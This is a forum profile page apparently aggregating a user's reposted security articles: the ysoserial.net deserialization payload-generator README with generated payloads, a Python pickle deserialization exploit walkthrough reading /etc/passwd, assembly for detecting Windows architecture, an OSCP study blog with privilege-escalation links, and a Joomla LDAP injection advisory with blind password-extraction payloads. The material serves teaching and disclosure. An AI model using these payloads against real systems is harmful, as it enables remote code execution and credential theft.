Jump to content

Nytro

Administrators
  • Posts

    18794
  • Joined

  • Last visited

  • Days Won

    742

Everything posted by Nytro

  1. ysoserial.net A proof-of-concept tool for generating payloads that exploit unsafe .NET object deserialization. Description ysoserial.net is a collection of utilities and property-oriented programming "gadget chains" discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host. It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having gadgets on the classpath. This project is inspired by Chris Frohoff's ysoserial project Disclaimer This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly. This software is a personal project and not related with any companies, including Project owner and contributors employers. Usage $ ./ysoserial -h ysoserial.net generates deserialization payloads for a variety of .NET formatters. Available formatters: ActivitySurrogateSelector (ActivitySurrogateSelector gadget by James Forshaw. This gadget ignores the command parameter and executes the constructor of ExploitClass class.) Formatters: BinaryFormatter ObjectStateFormatter SoapFormatter LosFormatter ObjectDataProvider (ObjectDataProvider Gadget by Oleksandr Mirosh and Alvaro Munoz) Formatters: Json.Net FastJson JavaScriptSerializer PSObject (PSObject Gadget by Oleksandr Mirosh and Alvaro Munoz. Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)) Formatters: BinaryFormatter ObjectStateFormatter SoapFormatter NetDataContractSerializer LosFormatter TypeConfuseDelegate (TypeConfuseDelegate gadget by James Forshaw) Formatters: BinaryFormatter ObjectStateFormatter NetDataContractSerializer LosFormatter Usage: ysoserial.exe [options] Options: -o, --output=VALUE the output format (raw|base64). -g, --gadget=VALUE the gadget chain. -f, --formatter=VALUE the formatter. -c, --command=VALUE the command to be executed. -t, --test whether to run payload locally. Default: false -h, --help show this message and exit Examples $ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t { '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd','/ccalc'] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} } $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLCBWZXJzaW9uPTMuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUBAAAAJVN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNPYmplY3QBAAAABkNsaVhtbAECAAAABgMAAACJFQ0KPE9ianMgVmVyc2lvbj0iMS4xLjAuMSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vcG93ZXJzaGVsbC8yMDA0LzA0Ij4mI3hEOw0KPE9iaiBSZWZJZD0iMCI+JiN4RDsNCiAgICA8VE4gUmVmSWQ9IjAiPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZSNTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uL1J1bnNwYWNlSW52b2tlNTwvVD4mI3hEOw0KICAgICAgPFQ+TWljcm9zb2Z0Lk1hbmFnZW1lbnQuSW5mcmFzdHJ1Y3R1cmUuQ2ltSW5zdGFuY2UjUnVuc3BhY2VJbnZva2U1PC9UPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZTwvVD4mI3hEOw0KICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4mI3hEOw0KICAgIDwvVE4+JiN4RDsNCiAgICA8VG9TdHJpbmc+UnVuc3BhY2VJbnZva2U1PC9Ub1N0cmluZz4mI3hEOw0KICAgIDxPYmogUmVmSWQ9IjEiPiYjeEQ7DQogICAgICA8VE5SZWYgUmVmSWQ9IjAiIC8+JiN4RDsNCiAgICAgIDxUb1N0cmluZz5SdW5zcGFjZUludm9rZTU8L1RvU3RyaW5nPiYjeEQ7DQogICAgICA8UHJvcHM+JiN4RDsNCiAgICAgICAgPE5pbCBOPSJQU0NvbXB1dGVyTmFtZSIgLz4mI3hEOw0KCQk8T2JqIE49InRlc3QxIiBSZWZJZCA9IjIwIiA+ICYjeEQ7DQogICAgICAgICAgPFROIFJlZklkPSIxIiA+ICYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uV2luZG93cy5NYXJrdXAuWGFtbFJlYWRlcltdLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1PC9UPiYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uQXJyYXk8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPFMgTj0iSGFzaCIgPiAgDQoJCSZsdDtSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSImZ3Q7DQoJICZsdDtPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgJmd0Ow0KICAgICAmbHQ7T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnMmZ3Q7DQogICAgICAgICZsdDtTeXN0ZW06U3RyaW5nJmd0O2NtZCZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgICAgJmx0O1N5c3RlbTpTdHJpbmcmZ3Q7L2MgImNhbGMiICZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgJmx0Oy9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycyZndDsNCiAgICAmbHQ7L09iamVjdERhdGFQcm92aWRlciZndDsNCiZsdDsvUmVzb3VyY2VEaWN0aW9uYXJ5Jmd0Ow0KCQkJPC9TPiYjeEQ7DQogICAgICAgICAgPC9MU1Q+JiN4RDsNCiAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgIDwvUHJvcHM+JiN4RDsNCiAgICAgIDxNUz4mI3hEOw0KICAgICAgICA8T2JqIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIj4gJiN4RDsNCiAgICAgICAgICA8VE4gUmVmSWQ9IjEiID4gJiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5Db2xsZWN0aW9ucy5BcnJheUxpc3Q8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPE9iaiBSZWZJZD0iMyI+ICYjeEQ7DQogICAgICAgICAgICAgIDxNUz4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49IkNsYXNzTmFtZSI+UnVuc3BhY2VJbnZva2U1PC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPFMgTj0iTmFtZXNwYWNlIj5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uPC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPE5pbCBOPSJTZXJ2ZXJOYW1lIiAvPiYjeEQ7DQogICAgICAgICAgICAgICAgPEkzMiBOPSJIYXNoIj40NjA5MjkxOTI8L0kzMj4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49Ik1pWG1sIj4gJmx0O0NMQVNTIE5BTUU9IlJ1bnNwYWNlSW52b2tlNSIgJmd0OyZsdDtQUk9QRVJUWSBOQU1FPSJ0ZXN0MSIgVFlQRSA9InN0cmluZyIgJmd0OyZsdDsvUFJPUEVSVFkmZ3Q7Jmx0Oy9DTEFTUyZndDs8L1M+JiN4RDsNCiAgICAgICAgICAgICAgPC9NUz4mI3hEOw0KICAgICAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgICAgICA8L0xTVD4mI3hEOw0KICAgICAgICA8L09iaj4mI3hEOw0KICAgICAgPC9NUz4mI3hEOw0KICAgIDwvT2JqPiYjeEQ7DQogICAgPE1TPiYjeEQ7DQogICAgICA8UmVmIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIiAvPiYjeEQ7DQogICAgPC9NUz4mI3hEOw0KICA8L09iaj4mI3hEOw0KPC9PYmpzPgs= Contributing Fork it Create your feature branch (git checkout -b my-new-feature) Commit your changes (git commit -am 'Add some feature') Push to the branch (git push origin my-new-feature) Create new Pull Request Additional Reading Are you my Type? Friday the 13th: JSON Attacks - Slides Friday the 13th: JSON Attacks - Whitepaper Exploiting .NET Managed DCOM Sursa: https://github.com/pwntester/ysoserial.net
      • 1
      • Upvote
  2. Explaining and exploiting deserialization vulnerability with Python (EN) Sat 23 September 2017 Dan Lousqui Deserialization? Even though it was neither present in OWASP TOP 10 2013, nor in OWASP TOP 10 2017 RC1, Deserialization of untrusted data is a very serious vulnerability that we can see more and more often on current security disclosures. Serialization and Deserialization are mechanisms used in many environment (web, mobile, IoT, ...) when you need to convert any Object (it can be an OOM, an array, a dictionary, a file descriptor, ... anything) to something that you can put "outside" of your application (network, file system, database, ...). This conversion can be in both way, and it's very convenient if you need to save or transfer data (Ex: share the status of a game in multilayer game, create an "export" / "backup" file in a project, ...). However, we will see in this article how this kind of behavior can be very dangerous... and therefore, why I think this vulnerability will be present in OWASP TOP 10 2017 RC2. In python? With python, the default library used to serialize and deserialize objects is pickle. It is a really easy to use library (compared to something like sqlite3) and very convenient if you need to persist data. For example, if you want to save objects: import pickle import datetime my_data = {} my_data['last-modified'] = str(datetime.datetime.now()) my_data['friends'] = ["alice", "bob"] pickle_data = pickle.dumps(my_data) with open("backup.data", "wb") as file: file.write(pickle_data) That will create a backup.data file with the following content: last-modifiedqX2017-09-23 00:23:29.986499qXfriendsq]q(XaliceqXbobqeu. And if you want to retrieve your data with Python, it's easy: import pickle with open("backup.data", "rb") as file: pickle_data = file.read() my_data = pickle.loads(pickle_data) my_data # {'friends': ['alice', 'bob'], 'last-modified': '2001-01-01 01:02:03.456789'} Awesome, isn't it? Introducing... Pickle pRick ! In order to illustrate the awesomeness of pickle in term of insecurity, I developed a vulnerable application. You can retrieve the application on the TheBlusky/pickle-prick repository. As always with my Docker, just execute the build.sh or build.bat script, and the vulnerable project will be launched. This application is for Ricks, from the Rick and Morty TV show. For those who don't know this show (shame ...) Rick is a genius scientist who travel between universes and planets for great adventures with his grand son Morty. The show implies many multiverse and time-travel dilemma. Each universe got their own Rick, so I developed an application for every Rick, so they can trace their adventures by storing when, where and with who they travelled. Each Ricks must be able to use the application, and the data should never be stored on the server, so one Rick cannot see the data of other Ricks. In order to do that, Rick can export his agenda into a pickle_rick.data file that can be imported later. Obviously, this application is vulnerable (Rick would not offer other Ricks this kind of gift without a backdoor ...). If you don't want to be spoiled, and want to play a little game, you should stop reading this article and try to launch the application (locally), and try to pwn it (Without looking at the exploit folder obviously, ...) What's wrong with Pickle? pickle (like any other serialization / deserialization library) provides a way to execute arbitrary command (even if few developers know it). In order to do that, you simply have to create an object, and to implement a __reduce__(self) method. This method should return a list of n elements, the first being a callable, and the others arguments. The callable will be executed with underlying arguments, and the result will be the "unserialization" of the object. For exemple, if you save the following pickle object: import pickle import os class EvilPickle(object): def __reduce__(self): return (os.system, ('echo Powned', )) pickle_data = pickle.dumps(EvilPickle()) with open("backup.data", "wb") as file: file.write(pickle_data) And then later, try to deserialize the object : import pickle with open("backup.data", "rb") as file: pickle_data = file.read() my_data = pickle.loads(pickle_data) A Powned will be displayed with the loads function, as echo Powned will be executed. It's easy then to imagine what we can do with such a powerful vulnerability. The exploit In the pickle-prick application, pickle is used in order to retrieve all adventures: async def do_import(request): session = await get_session(request) data = await request.post() try: pickle_prick = data['file'].file.read() except: session['errors'] = ["Couldn't read pickle prick file."] return web.HTTPFound('/') prick = base64.b64decode(pickle_prick.decode()) session['adventures'] = [i for i in pickle.loads(prick)] return web.HTTPFound('/') So if we upload a malicious pickle, it will be executed. However, if we want to be able to read the result of a code execution, the __reducer__ callable, must return an object that meets with adventures signature (which is an array of dictionary having a date, universe, planet and a morty). In order to do that, we will use the vulnerability twice: a first time to upload a malicious python code, and a second time to execute it. 1. Generating a payload to generate a payload We want to upload a python file that contain a callable that meets adventures signature and will be executed on the server. Let's write an evil_rick_shell.py file with such a code: def do_evil(): with open("/etc/passwd") as f: data = f.readlines() return [{"date": line, "dimension": "//", "planet": "//","morty": "//"} for line in data] Now, let's create a pickle that will write this file on the server: import pickle import base64 import os class EvilRick1(object): def __reduce__(self): with open("evil_rick_shell.py") as f: data = f.readlines() shell = "\n".join(data) return os.system, ("echo '{}' > evil_rick_shell.py".format(shell),) prick = pickle.dumps(EvilRick1()) if os.name == 'nt': # Windows trick prick = prick[0:3] + b"os" + prick[5:] pickle_prick = base64.b64encode(prick).decode() with open("evil_rick1.data", "w") as file: file.write(pickle_prick) This pickle file will trigger an echo '{payload}' > evil_rick_shell.py command on the server, so the payload will be installed. As the os.system callable does not meet with adventure signature, uploading the evil_rick1.data should return a 500 error, but it will be too late for any security 2. Generating a payload to execute a payload Now let's create a pickle object that will call the evil_rick_shell.do_evil callable: import pickle import base64 import evil_rick_shell class EvilRick2(object): def __reduce__(self): return evil_rick_shell.do_evil, () prick = pickle.dumps(EvilRick2()) pickle_prick = base64.b64encode(prick).decode() with open("evil_rick2.data", "w") as file: file.write(pickle_prick) The evil_rick_shell.do_evil callable meeting with adventure signature, uploading the evil_rick2.data should be fine, and should add each line of the /etc/passwd file as an adventure. Build it all together Once both payloads are generated, simply upload the first one, then the second one, and you should be able to have this amazing screen: We can see that the do_evil() payload has been triggered, and we can see the content of /etc/passwd file. Even though the content of this file is not (really) sensitive, it's quite easy to imagine something more evil to be executed on Rick's server. How to protect against it It's simple... don't use pickle (or any other "wannabe" universal and automatic serializer) if you are going to parse untrusted data with it. It's not that hard to write your own convert_data_to_string(data) and convert_string_to_data(string) functions that won't be able to interpret forged object with malicious code within. I hope you enjoyed this article, and have fun with it Dan Lousqui IT Security Senior Consultant, developer, open source enthousiast, and so much more ! Sursa: https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
      • 1
      • Like
  3. Screenshots Description IMPORTANT: This app works with Windows 10 Pro and Home but not with Windows 10 S. We've updated WinDbg to have more modern visuals, faster windows, a full-fledged scripting experience, and Time Travel Debugging, all with the easily extensible debugger data model front and center. WinDbg Preview is using the same underlying engine as WinDbg today, so all the commands, extensions, and workflows you're used to will still work as they did before. See http://aka.ms/windbgblog and https://go.microsoft.com/fwlink/p/?linkid=854349 for more information! Sursa: https://www.microsoft.com/en-us/store/p/windbg-preview/9pgjgd53tn86
  4. September 24, 2017 Detecting Architecture in Windows Leave a comment After a while I thought of posting something interesting I noticed. Some of you know this old method of detecting the architecture using the CS segment register. This was also used in the Kronos malware 1 2 3 xor eax,eax mov ax,cs shr eax,5 I had a look at the segment registers last night and I found out that we can use ES, GS and FS segment registers for detecting the architecture as well. Using ES 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ; Author : @OsandaMalith main: xor eax,eax mov ax,es ror ax, 0x3 and eax,0x1 test eax, eax je thirtytwo invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION jmp exit thirtytwo: invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION exit: invoke ExitProcess, 0 Using GS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ; Author : @OsandaMalith main: xor eax, eax mov eax, gs test eax, eax je thirtytwo invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION jmp exit thirtytwo: invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION exit: invoke ExitProcess, 0 .end main Using TEB Apart from that, you can also use TEB + 0xc0 entry which is ‘WOW32Reserved’. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ; Author : @OsandaMalith main: xor eax, eax mov eax, [FS:0xc0] test eax, eax je thirtytwo invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION jmp exit thirtytwo: invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION exit: invoke ExitProcess, 0 .end main I included all in one and coded a small C application. I’m sure there might be many other tricks to detect the architecture. This might come handy in shellcoding #include <Windows.h> #include <wchar.h> /* * Author: Osanda Malith Jayathissa - @OsandaMalith * Website: https://osandamalith.com * Description: Few tricks that you can use to detect the architecture in Windows * Link : http://osandamalith.com/2017/09/24/detecting-architecture-in-windows/ */ BOOL detectArch_ES() { #if defined(_MSC_VER) _asm { xor eax, eax mov ax, es ror ax, 0x3 and eax, 0x1 } #elif defined(__GNUC__) asm( ".intel_syntax noprefix;" "xor eax, eax;" "mov ax, es;" "ror ax, 0x3;" "and eax, 0x1;" ); #endif } BOOL detectArch_GS() { #if defined(_MSC_VER) _asm { xor eax, eax mov ax, gs } #elif defined(__GNUC__) asm( ".intel_syntax noprefix;" "xor eax, eax;" "mov ax, gs;" ); #endif } BOOL detectArch_TEB() { #if defined(_MSC_VER) _asm { xor eax, eax mov eax, fs:[0xc0] } #elif defined(__GNUC__) asm( ".intel_syntax noprefix;" "xor eax, eax;" "mov eax, fs:[0xc0];" ); #endif } int main(int argc, char* argv[]) { wprintf( !detectArch_ES() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" ); wprintf( !detectArch_GS() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" ); wprintf( !detectArch_TEB() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" ); return 1337; } view raw detectArch.c hosted with by GitHub Sursa: https://osandamalith.com/2017/09/24/detecting-architecture-in-windows/
  5. OSCP Certification by ciaranmcnally Given I have been working in information security for the past few years, I became well aware of the different certifications available as a means of professional development. The certification that stood out as gaining the most respect from the security community seemed to be the “(OSCP) Offensive Security Certified Professional” certificate, I witnessed this time and time again in conversations online. The reason often given is that it is a tough 24 hour practical exam vs a multiple choice questionnaire like many other security certificates. The OSCP is also listed regularly as a desirable requirement for many different kinds of infosec engineering jobs. I recently received confirmation that I have successfully achieved this certification. To anyone interested in pursuing the OSCP, I would completely encourage it. There is no way you can come away from this experience without adding a few new tricks or tools to your security skills arsenal and aside from all of that, it’s also very fun. This certificate will demonstrate to clients or to any potential employer that you have a good wide understanding of penetration testing with a practical skill-set to back up the knowledge. I wanted to get this as I’ve had clients in the past not follow up on using my services due to me not having any official security certificates (especially CREST craving UK based customers). Hopefully this opens up some doors to new customers. Before undertaking this course I already had a lot of experience performing vulnerability assessments and penetrations tests, I also had a few CVEs under my belt and have been quite active in the wider information security community by creating tools, taking part in bug bounties and being a fan of responsible disclosure in general. I found the challenge presented by this exam to be quite humbling and very much a worthwhile engagement. I would describe the hacking with kali course materials and videos as very entry-level friendly which is perfect for someone with a keen interest looking to learn the basics of penetration testing. The most valuable part of the course for those already familiar with the basics is the interactive lab environment, this is an amazing experience and it’s hard not to get excited thinking about it. There were moments of frustration and teeth-grinding but it was a very enjoyable way to sharpen skills and try out new techniques or tools. I signed up for the course initially a full year ago while working full time on contracts and found it extremely difficult to find the time to work on the labs as I had multiple ongoing projects and was doing bug bounties quite actively too. I burnt out fairly quick and didn’t concentrate on it at all. I did one or two of the “known to be hard” machines in the labs fairly easily which convinced me I was ready and sat the exam having compromised less than 10 of the lab hosts. This was of course silly and I only managed 2 roots and one local access shell which wasn’t near enough points to pass and very much dulled my arrogance at the time. I didn’t submit an exam report and decided to focus on my contracts and dedicate my time to the labs properly at a later date. Fast forward over a year later to the start of this month (September) and I had 2 weeks free that I couldn’t get contract work for. So I purchased a lab extension with the full intention of dedicating my time completely to obtaining this certificate. In the two weeks I got around 20 or so lab machines and set the date for my first real exam attempt. This went well but I didn’t quite make it over the line. I rooted 3 machines and fell short of privilege escalating on a 4th windows host. I was so close and possibly could have passed if I did the lab report and exercises, however this time around I wasn’t upset by the failure and became more determined than ever to keep trying. I booked another 2 weeks in the labs, focused on machines with manual windows privilege escalation and booked my next exam sitting, successfully nailing it. As I had learned a lot of penetration testing skills doing bug bounties, I found that it was very easy to identify and gain remote access to the lab machines, I usually gained remote shell access within the first 20 or 30 minutes for the large majority of the attempted targets. I very quickly found out that my weakest area was local privilege escalation. During my contract engagements, it is a regular occurrence that my clients request I don’t elevate any further with a remote code execution issue on a live production environment. This activity is also greatly discouraged in bug bounties so I can very much see why I didn’t have much skill in this area. The OSCP lab environment taught me a large amount of techniques and different ways of accomplishing this. I feel I have massively skilled up with regard to privilege escalation on Linux or Windows hosts. I’m very happy to join the ranks of the (OSCP) Offensive Security Certified Professionals and would like to thank anyone who helped me on this journey by providing me with links to quality material produced by the finest of hackers. Keeping the hacker knowledge sharing mantra in mind, below is a categorized list of very useful resources I have used during my journey to achieving certification. I hope these help you to overcome many obstacles by trying harder! Mixed https://www.nop.cat/nmapscans/ https://github.com/1N3/PrivEsc https://github.com/xapax/oscp/blob/master/linux-template.md https://github.com/xapax/oscp/blob/master/windows-template.md https://github.com/slyth11907/Cheatsheets https://github.com/erik1o6/oscp/ https://backdoorshell.gitbooks.io/oscp-useful-links/content/ https://highon.coffee/blog/lord-of-the-root-walkthrough/ MsfVenom https://www.offensive-security.com/metasploit-unleashed/msfvenom/ https://netsec.ws/?p=331 Shell Escape Techniques https://netsec.ws/?p=337 https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells https://airnesstheman.blogspot.ca/2011/05/breaking-out-of-jail-restricted-shell.html https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells Pivoting http://www.fuzzysecurity.com/tutorials/13.html http://exploit.co.il/networking/ssh-tunneling/ https://www.sans.org/reading-room/whitepapers/testing/tunneling-pivoting-web-application-penetration-testing-36117 https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/ https://www.offensive-security.com/metasploit-unleashed/portfwd/ Linux Privilege Escalation https://0x90909090.blogspot.ie/2015/07/no-one-expect-command-execution.html https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/\#gref https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://github.com/mzet-/linux-exploit-suggester https://github.com/SecWiki/linux-kernel-exploits https://highon.coffee/blog/linux-commands-cheat-sheet/ https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt https://github.com/lucyoa/kernel-exploits https://www.rebootuser.com/?p=1758 https://www.securitysift.com/download/linuxprivchecker.py https://www.youtube.com/watch?v=dk2wsyFiosg https://www.youtube.com/watch?v=2NMB-pfCHT8https://www.youtube.com/watch?v=1A7yJxh-fyc https://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/ https://github.com/foxglovesec/RottenPotato https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py https://github.com/pentestmonkey/windows-privesc-check https://github.com/PowerShellMafia/PowerSploit https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Windows/Windows_Privilege_Escalation.md https://github.com/SecWiki/windows-kernel-exploits https://hackmag.com/security/elevating-privileges-to-administrative-and-further/ https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ https://toshellandback.com/2015/11/24/ms-priv-esc/ https://www.gracefulsecurity.com/privesc-unquoted-service-path/ https://www.commonexploits.com/unquoted-service-paths/ https://www.exploit-db.com/dll-hijacking-vulnerable-applications/ https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be Sursa: https://securit.ie/blog/?p=70
  6. Nu stiu cine sunt, nu am auzit de ei, dar din moment ce e gratuit si ei nu au nimic de castigat (doar din donatii), mi se pare o idee OK.
  7. Se mai intampla, nu e chiar asa grav, cred.
  8. Ce hateri sunteti, oamenii incearca sa faca ceva util. Stati sa crape filelist sa vedeti ce o sa mai cautati asta...
  9. NetRipper has now support for Chrome x64 SSL Hook (last) version https://github.com/NytroRST/NetRipper/
  10. Joomla! 3.7.5 - Takeover in 20 Seconds with LDAP Injection 20 Sep 2017 by Dr. Johannes Dahse, Robin Peraglie With over 84 million downloads, Joomla! is one of the most popular content management systems in the World Wide Web. It powers about 3.3% of all websites’ content and articles. Our code analysis solution RIPS detected a previously unknown LDAP injection vulnerability in the login controller. This one vulnerability could allow remote attackers to leak the super user password with blind injection techniques and to fully take over any Joomla! <= 3.7.5 installation within seconds that uses LDAP for authentication. Joomla! has fixed the vulnerability in the latest version 3.8. Requirements - Who is affected Installations with the following requirements are affected by this vulnerability: Joomla! version 1.5 <= 3.7.5 is installed Joomla! is configured to use LDAP for authentication This is not a configuration flaw and an attacker does not need any privileges to exploit this vulnerability. Impact - What can an attacker do By exploiting a vulnerability in the login page, an unprivileged remote attacker can efficiently extract all authentication credentials of the LDAP server that is used by the Joomla! installation. These include the username and password of the super user, the Joomla! administrator. An attacker can then use the hijacked information to login to the administrator control panel and to take over the Joomla! installation, as well as potentially the web server, by uploading custom Joomla! extensions for remote code execution. Vulnerability Analysis - CVE-2017-14596 Our code analysis solution RIPS automatically identified the vulnerability that spans over the following nested code lines. First, in the LoginController the Joomla! application receives the user-supplied credentials from the login form. /administrator/components/com_login/controller.php class LoginController extends JControllerLegacy { public function login() { ⋮ $app = JFactory::getApplication(); ⋮ $model = $this->getModel('login'); $credentials = $model->getState('credentials'); ⋮ $app->login($credentials, array('action' => 'core.login.admin')); } } The credentials are passed on to the login method which then invokes the authenticatemethod. /libraries/cms/application/cms.php class JApplicationCms extends JApplicationWeb { public function login($credentials, $options = array()) { ⋮ $authenticate = JAuthentication::getInstance(); $authenticate->authenticate($credentials, $options); } } /libraries/joomla/authentication/authentication.php class JAuthentication extends JObject { public function authenticate($credentials, $options = array()) { ⋮ $plugin->onUserAuthenticate($credentials, $options, $response); } } Based on the plugin that is used for authentication, the authenticate method passes the credentials to the onUserAuthenticate method. If Joomla! is configured to use LDAP for authentication, the LDAP plugin’s method is invoked. /plugins/authentication/ldap/ldap.php class PlgAuthenticationLdap extends JPlugin { public function onUserAuthenticate($credentials, $options, &$response) { ⋮ $userdetails = $ldap->simple_search( str_replace( '[search]', $credentials['username'], $this->params->get('search_string') ) ); } } In the LDAP plugin, the username credential is embedded into the LDAP query specified in the search_string option. According to the official Joomla! documentation, the search_stringconfiguration option is “a query string used to search for the user, where [search] is directly replaced by search text from the login field”, for example “uid=[search]“. The LDAP query is then passed to the simple_search method of the LdapClient which connects to the LDAP server and performs the ldap_search. /libraries/vendor/joomla/ldap/src/LdapClient.php class LdapClient { public function simple_search($search) { $results = explode(';', $search); foreach ($results as $key => $result) { $results[$key] = '(' . $result . ')'; } return $this->search($results); } public function search(array $filters, ...) { foreach ($filters as $search_filter) { $search_result = @ldap_search($res, $dn, $search_filter, $attr); ⋮ } } } Even if RIPS is unaware of the exact LDAP query that is loaded from an external configuration file, RIPS detects and reports successfully the root cause of this vulnerability: User input is mixed unsanitized with LDAP query markup that is passed to the sensitive ldap_searchfunction. The vulnerability was detected within 7 minutes in half a million lines of Joomla! code. The truncated analysis results are available in our RIPS demo application. Please note that we limited the results to the issues described in this post in order to ensure a fix is available. See RIPS report Proof Of Concept - Blind LDAP Injection The lack of input sanitization of the username credential used in the LDAP query allows an adversary to modify the result set of the LDAP search. By using wildcard characters and by observing different authentication error messages, the attacker can literally search for login credentials progressively by sending a row of payloads that guess the credentials character by character. XXX;(&(uid=Admin)(userPassword=A*)) XXX;(&(uid=Admin)(userPassword=B*)) XXX;(&(uid=Admin)(userPassword=C*)) ... XXX;(&(uid=Admin)(userPassword=s*)) ... XXX;(&(uid=Admin)(userPassword=se*)) ... XXX;(&(uid=Admin)(userPassword=sec*)) ... XXX;(&(uid=Admin)(userPassword=secretPassword)) Each of these payloads yield exactly one out of two possible states which allow an adversary to abuse the server as an Oracle. A filter bypass is necessary for exploitation that is not covered in this blog post. With an optimized version of these payloads one bit per request can be extracted from the LDAP server which results in a highly efficient blind LDAP injection attack. Time Line Date What 2017/07/27 Provided vulnerability details and PoC to vendor 2017/07/29 Vendor confirmed security issue 2017/09/19 Vendor released fixed version Summary As one of the most popular open source CMS applications, 